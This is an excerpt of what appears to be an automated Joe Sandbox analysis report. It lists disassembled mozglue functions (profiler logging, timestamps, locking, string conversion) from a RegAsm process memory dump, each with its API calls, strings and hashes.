                                                          • Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
                                                          • Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1
                                                        • __aulldiv.LIBCMT ref: 6C0C346B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                        • String ID: KernelBase.dll$QueryInterruptTime
                                                        • API String ID: 3006643210-2417823192
                                                        • Opcode ID: 19c88bd86552b6fbbbac5d99cd81764ae200abaf738f7596980fd580e2a12365
                                                        • Instruction ID: a61bbd62950b30bd1cd672956fa84583eed71daed7edce50aaa42bf88f00f947
                                                        • Opcode Fuzzy Hash: 19c88bd86552b6fbbbac5d99cd81764ae200abaf738f7596980fd580e2a12365
                                                        • Instruction Fuzzy Hash: 9461E071A187018FC711DF38C45175AB3F5FFCA358F218B1DE8A9A3690EB34A54A8B42
                                                        Function 6C126660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InitializeCriticalSection.KERNEL32(6C14F618), ref: 6C126694
                                                        • GetThreadId.KERNEL32(?), ref: 6C1266B1
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C1266B9
                                                        • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C1266E1
                                                        • EnterCriticalSection.KERNEL32(6C14F618), ref: 6C126734
                                                        • GetCurrentProcess.KERNEL32 ref: 6C12673A
                                                        • LeaveCriticalSection.KERNEL32(6C14F618), ref: 6C12676C
                                                        • GetCurrentThread.KERNEL32 ref: 6C1267FC
                                                        • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C126868
                                                        • RtlCaptureContext.NTDLL ref: 6C12687F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                        • String ID: WalkStack64
                                                        • API String ID: 2357170935-3499369396
                                                        • Opcode ID: 147ada337c11c644276b39606448c3e03f4b5b826ebae148dd1b15bb8c78c1d0
                                                        • Instruction ID: 1d6ae511a052df7811aae23a53bd46b7707a8be3d1c8db952bd1e049597b8878
                                                        • Opcode Fuzzy Hash: 147ada337c11c644276b39606448c3e03f4b5b826ebae148dd1b15bb8c78c1d0
                                                        • Instruction Fuzzy Hash: C551CB75A09304AFDB11DF24C844B5EBBF4FF99718F00892DF99897680D778E9488B92
                                                        Function 6C10DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10DE73
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10DF7D
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10DF8A
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10DFC9
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10DFF7
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10E000
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C0D4A68), ref: 6C10DE7B
                                                          • Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
                                                          • Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508
                                                          • Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
                                                          • Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA
                                                        • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C0D4A68), ref: 6C10DEB8
                                                        • free.MOZGLUE(00000000,?,6C0D4A68), ref: 6C10DEFE
                                                        • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C10DF38
                                                        Strings
                                                        • <none>, xrefs: 6C10DFD7
                                                        • [I %d/%d] locked_profiler_stop, xrefs: 6C10DE83
                                                        • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C10E00E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                        • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                        • API String ID: 1281939033-809102171
                                                        • Opcode ID: 2ed2f07f8ce1430c2f758492dad734db0361d21a798cb29f271fb279f5f4d7f1
                                                        • Instruction ID: 97a1fab771f412d707956a854bcf666705db0d5e3dc84cb3fe1ecd0733ab3097
                                                        • Opcode Fuzzy Hash: 2ed2f07f8ce1430c2f758492dad734db0361d21a798cb29f271fb279f5f4d7f1
                                                        • Instruction Fuzzy Hash: 144104357016109BDB10BF64D818BAE7775EB8631CF58C069E92997B41CF34A807DBE2
                                                        Function 6C11D840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11D85F
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D86C
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D918
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11D93C
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D948
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D970
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11D976
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D982
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D9CF
                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C11DA2E
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11DA6F
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11DA78
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C11DA91
                                                          • Part of subcall function 6C0E5C50: GetTickCount64.KERNEL32 ref: 6C0E5D40
                                                          • Part of subcall function 6C0E5C50: EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0E5D67
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11DAB7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                        • String ID:
                                                        • API String ID: 1195625958-0
                                                        • Opcode ID: 4ab3fafb3cb17ea109b17055f6ee1e5f797be458044364edb1d6eb844ee52fed
                                                        • Instruction ID: 9968a58f1abd55691957026bf27fef60438fed2c9fc8d75ad19d9e9d7872f840
                                                        • Opcode Fuzzy Hash: 4ab3fafb3cb17ea109b17055f6ee1e5f797be458044364edb1d6eb844ee52fed
                                                        • Instruction Fuzzy Hash: 95719D756043049FCB00EF29C884B9EBBF5FF89318F15866DE85A9B741EB34A944CB91
                                                        Function 6C11D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11D4F0
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D4FC
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D52A
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11D530
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D53F
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D55F
                                                        • free.MOZGLUE(00000000), ref: 6C11D585
                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C11D5D3
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11D5F9
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D605
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D652
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11D658
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D667
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D6A2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                        • String ID:
                                                        • API String ID: 2206442479-0
                                                        • Opcode ID: c1f372f1e07392d657dcb0374a0160a09f0292c3a7b03c2b99c1cc0db77e7a26
                                                        • Instruction ID: 2b8ea35cd0e412d92f0e8242b3017003f609b194ba2cceb3f3126b1a505ec4be
                                                        • Opcode Fuzzy Hash: c1f372f1e07392d657dcb0374a0160a09f0292c3a7b03c2b99c1cc0db77e7a26
                                                        • Instruction Fuzzy Hash: 27515BB1608B05DFC704EF35C484A9ABBF4FF89318F00862EE85A97B11DB34A945CB91
                                                        Function 6C0E5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C0E56D1
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0E56E9
                                                        • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C0E56F1
                                                        • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C0E5744
                                                        • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C0E57BC
                                                        • GetTickCount64.KERNEL32 ref: 6C0E58CB
                                                        • EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0E58F3
                                                        • __aulldiv.LIBCMT ref: 6C0E5945
                                                        • LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0E59B2
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C14F638,?,?,?,?), ref: 6C0E59E9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                        • String ID: MOZ_APP_RESTART
                                                        • API String ID: 2752551254-2657566371
                                                        • Opcode ID: 78e84c0bb0d1fe49d0fd3c96e2429d03105a9c263ddeb461175b327151e29852
                                                        • Instruction ID: e65223014f4311d5501bf07f8dd2a437da99687c06d20407784cccc3b6514718
                                                        • Opcode Fuzzy Hash: 78e84c0bb0d1fe49d0fd3c96e2429d03105a9c263ddeb461175b327151e29852
                                                        • Instruction Fuzzy Hash: 3FC18C75A093509FD705DF28C44066AFBF1BFCA718F058A1DE8D897760E730A886DB82
                                                        Function 6C10EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10EC84
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10EC8C
                                                          • Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
                                                          • Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10ECA1
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10ECAE
                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C10ECC5
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10ED0A
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C10ED19
                                                        • CloseHandle.KERNEL32(?), ref: 6C10ED28
                                                        • free.MOZGLUE(00000000), ref: 6C10ED2F
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10ED59
                                                        Strings
                                                        • [I %d/%d] profiler_ensure_started, xrefs: 6C10EC94
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                        • String ID: [I %d/%d] profiler_ensure_started
                                                        • API String ID: 4057186437-125001283
                                                        • Opcode ID: 1a91c98e8b3da63a4660d9d16d7a480ca99a421c3dff7e64ce33b9db87ea7b32
                                                        • Instruction ID: b001678232bf7779c058c6216d05fe1fbe98f56743d1bf281d1c589392010671
                                                        • Opcode Fuzzy Hash: 1a91c98e8b3da63a4660d9d16d7a480ca99a421c3dff7e64ce33b9db87ea7b32
                                                        • Instruction Fuzzy Hash: C321E2B5700508ABDB00AF25D808BAA7779EF8636CF14C220FC2897781DF359906DBA1
                                                        Function 6C0D3A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AcquireSRWLockShared.KERNEL32 ref: 6C0D3BB4
                                                        • ReleaseSRWLockShared.KERNEL32 ref: 6C0D3BD2
                                                        • AcquireSRWLockExclusive.KERNEL32 ref: 6C0D3BE5
                                                        • ReleaseSRWLockExclusive.KERNEL32 ref: 6C0D3C91
                                                        • ReleaseSRWLockShared.KERNEL32 ref: 6C0D3CBD
                                                        • moz_xmalloc.MOZGLUE ref: 6C0D3CF1
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
                                                        • String ID:
                                                        • API String ID: 1881024734-0
                                                        • Opcode ID: bb0e3c299b45adbad8e51773f30abad58ddb1f74c2ee1d4ba34c899ecdccbdd8
                                                        • Instruction ID: 66d679fc85a3338a13b26a106b9981f8195db619baaffa00ddadde150c0caf20
                                                        • Opcode Fuzzy Hash: bb0e3c299b45adbad8e51773f30abad58ddb1f74c2ee1d4ba34c899ecdccbdd8
                                                        • Instruction Fuzzy Hash: ECC15CB5A09701CFC714DF28C08465ABBF5BF89318F168A5ED9998BB11D730E885CF82
                                                        Function 6C108ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0CEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0CEB83
                                                        • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C10B392,?,?,00000001), ref: 6C1091F4
                                                          • Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
                                                          • Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                        • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                        • API String ID: 3790164461-3347204862
                                                        • Opcode ID: dac3fa97ccf6624518feeea69ab7d0101bbde0c54d6a2b16974b8789602e74fe
                                                        • Instruction ID: 786e408fdb5f7bde73c0716ac95d492e3154240549ec8b4b81391bfbb39cecd1
                                                        • Opcode Fuzzy Hash: dac3fa97ccf6624518feeea69ab7d0101bbde0c54d6a2b16974b8789602e74fe
                                                        • Instruction Fuzzy Hash: EDB1E3B0B002099BDB14DF98C8A6BEEBBB5BF85318F104029D515ABF80CB31E945CBD1
                                                        Function 6C0EC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0EC5A3
                                                        • WideCharToMultiByte.KERNEL32 ref: 6C0EC9EA
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C0EC9FB
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C0ECA12
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C0ECA2E
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0ECAA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWidestrlen$freemalloc
                                                        • String ID: (null)$0
                                                        • API String ID: 4074790623-38302674
                                                        • Opcode ID: 576204c6ba05a29fab01f22a2c3a848944e2bc3fc8c646c9065328c37fe6606f
                                                        • Instruction ID: f2c5e59899a8d759e8c03f3e7f24619c3e0160a6818b235ae89bb6757c295bec
                                                        • Opcode Fuzzy Hash: 576204c6ba05a29fab01f22a2c3a848944e2bc3fc8c646c9065328c37fe6606f
                                                        • Instruction Fuzzy Hash: A7A1AB306493429FDB00EF28C55475FBBE1EFCA748F04896DE89997641D732E805CB82
                                                        Function 6C0EC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0EC784
                                                        • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0EC801
                                                        • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C0EC83D
                                                        • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0EC891
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                        • String ID: INF$NAN$inf$nan
                                                        • API String ID: 1991403756-4166689840
                                                        • Opcode ID: 7ba216c34565d57b4a6901ca508dc2917716a7fcffc14e471bb30cb2704afe9d
                                                        • Instruction ID: 066fac341b6209cafb9f8e20da00587e10393cbb732ac853715a216cc913d13f
                                                        • Opcode Fuzzy Hash: 7ba216c34565d57b4a6901ca508dc2917716a7fcffc14e471bb30cb2704afe9d
                                                        • Instruction Fuzzy Hash: E2516F70A487408FD704AF68C58179EFBF0BF9E308F408A2DE9D5A7650E771D9898B42
                                                        Function 6C0C3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0C3492
                                                        • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0C34A9
                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0C34EF
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C0C350E
                                                        • __Init_thread_footer.LIBCMT ref: 6C0C3522
                                                        • __aulldiv.LIBCMT ref: 6C0C3552
                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0C357C
                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0C3592
